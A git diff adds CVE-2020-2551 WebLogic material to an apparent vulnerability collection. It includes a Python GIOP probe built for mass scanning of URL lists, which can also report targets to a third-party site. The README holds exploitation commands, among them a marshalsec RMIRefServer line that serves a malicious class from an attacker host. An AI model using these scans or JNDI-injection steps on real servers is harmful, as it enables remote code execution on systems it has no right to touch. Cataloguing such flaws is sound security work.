diff --git a/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
new file mode 100644
index 0000000000000000000000000000000000000000..c96ba6f700880ae7a941c2a83d197f83e04c91cb
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket,argparse,sys,requests,os,atexit
+from urllib.parse import urlparse
+from multiprocessing.dummy import Pool as ThreadPool
+"""
+only check CVE-2020-2551 vuls
+Twitter: @Hktalent3135773
+Creator: 51pwn_com
+Site: https://51pwn.com
+How use:
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+cat ../T3.txt rst/T3.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+cat ../T3.txt rst/*.txt gy/*.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+"""
+g_f = None
+
+bDebug=False
+g_oNRpt={}
+def log(e):
+ if bDebug:
+ print(e)
+def doThreads(fnCbk,lists,nThreads=64):
+ pool = ThreadPool(nThreads)
+ pool.map(fnCbk,lists)
+ pool.close()
+ pool.join()
+
+def checkOnline(url,cbkUrl):
+ try:
+ requests.post('http://51pwn.com/CVE-2020-2551/',data={'url':url,cbkUrl:cbkUrl},timeout=(5,9))
+ except Exception as e:
+ log(e)
+ pass
+
+def doSendOne(ip,port,data):
+ sock=None
+ res=None
+ s=ip+':'+str(port)
+ try:
+ if 0 == len(ip) or s in g_oNRpt:
+ return
+ g_oNRpt[s]='1'
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.settimeout(7)
+ server_addr = (ip, int(port))
+ sock.connect(server_addr)
+ sock.send(data)
+ res = sock.recv(10)
+ if b'GIOP' in res:
+ #checkOnline(ip+':'+str(port),'http://yourSite/?target={}&rst={}')
+ return True
+ except Exception as e:
+ log(s)
+ log(e)
+ pass
+ finally:
+ if sock!=None:
+ sock.close()
+ return False
+g_bPipe=False
+def doOne(url):
+ global g_bPipe,g_f
+ if not 'http' in url:
+ url='http://'+url
+ oH=urlparse(url)
+ a=oH.netloc.split(':')
+ port=80
+ if 2 == len(a):
+ port=a[1]
+ elif 'https' in oH.scheme:
+ port=443
+ if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')):
+ print('found CVE-2020-2551 ', oH.netloc)
+ g_f.write(oH.netloc + "\n")
+ g_f.flush()
+ elif g_bPipe == False:
+ print('not found CVE-2020-2551 ', oH.netloc)
+
+def doPipe():
+ global g_bPipe
+ g_bPipe=True
+ buff = ''
+ a=[]
+ while True:
+ buff = sys.stdin.readline()
+ if not buff:
+ break
+ if buff.endswith('\n'):
+ szTmpCmd = buff[:-1]
+ szTmpCmd=szTmpCmd.rstrip()
+ buff = ''
+ if not szTmpCmd:
+ break
+ a.append(szTmpCmd)
+ doThreads(doOne,a)
+
+def exit_handler():
+ global g_f
+ g_f.close()
+atexit.register(exit_handler)
+szFileOn = os.path.dirname(os.path.abspath(__file__))+ "/CVE-2020-2551.txt"
+if __name__=='__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u","--url",help="http://xxx.xxx.xxx:7001/")
+ parser.add_argument("-e","--pipeCheck",help="pipe check is Ok,thread 32",action="store_true")
+ parser.add_argument("-o","--out",help="out file name",default="CVE-2020-2551.txt")
+ args = parser.parse_args()
+ if args.out:
+ szFileOn=args.out
+ g_f = open(szFileOn,"a+")
+
+ if args.url:
+ doOne(args.url)
+ if args.pipeCheck:
+ doPipe()
\ No newline at end of file
diff --git a/cve/weblogic/2020/CVE-2020-2551/README.md b/cve/weblogic/2020/CVE-2020-2551/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..4253d57aa70692107409ddc8bddba7d4a439693d
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-2551/README.md
@@ -0,0 +1,114 @@
+Twitter: [@Hktalent3135773](https://twitter.com/Hktalent3135773)
+[](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=myhktools%20-%20Automated%20Pentest%20Recon%20Scanner%20%40Hktalent3135773&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2Fhktalent%2Fmyhktools)
+[](https://twitter.com/intent/follow?screen_name=Hktalent3135773)
+
+# 0、how get pro exploit tools?
+see https://github.com/hktalent/CVE-2020-2551/issues/5
+
+# 1、CVE-2020-2551
+CVE-2020-2551 poc exploit python example
+keys:
+GIOP corba
+
+
+
+### How use
+```
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+# now result to data/*.txt
+java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+```
+
+### t3, t3s, http, https, iiop, iiops
+```
+service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
+service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+```
+
+## poc
+
+
+
+
+# 2、your know your do
+```
+{
+ "ejb": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ],
+ "mgmt": {
+ "MEJB": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+ },
+ "javax": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "jdbc": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "db_xf": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "mejbmejb_jarMejb_EO": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "weblogic": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+}
+```
+
+# 3、ejb
+```
+/bea_wls_internal/classes/mejb@/
+
+weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
+```
+
+# 4、jta
+```
+x.lookup("ejb/mgmt/MEJB").remove(jta);
+```
+# 5、logs
+- fix rmi use Jdk7u21 payload,not work for remote jdk8
+don‘t use
+```
+java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'
+```
+use,XXclass.class from jdk6 build
+```
+java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099
+```
+
+# 6、thanks for
+@[r4v3zn](https://github.com/r4v3zn)
+@[0nise](https://github.com/0nise)
+[](https://51pwn.com)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a1540092a205e81a2bf4f1ff4dd15401397c5138
--- /dev/null
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-2551
+source: https://github.com/hktalent/CVE-2020-2551
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ - https://www.oracle.com/security-alerts/cpujan2020.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-2551
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401dfd5e870b030788445d302e79e80a5a840..d5e85d494242ec876707192a09db7c680814360e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,8 @@ cve:
- CVE-2019-3396
- CVE-2021-26084
- CVE-2022-26134
+ weblogic:
+ - CVE-2020-2551
polkit:
- CVE-2021-4034
vim: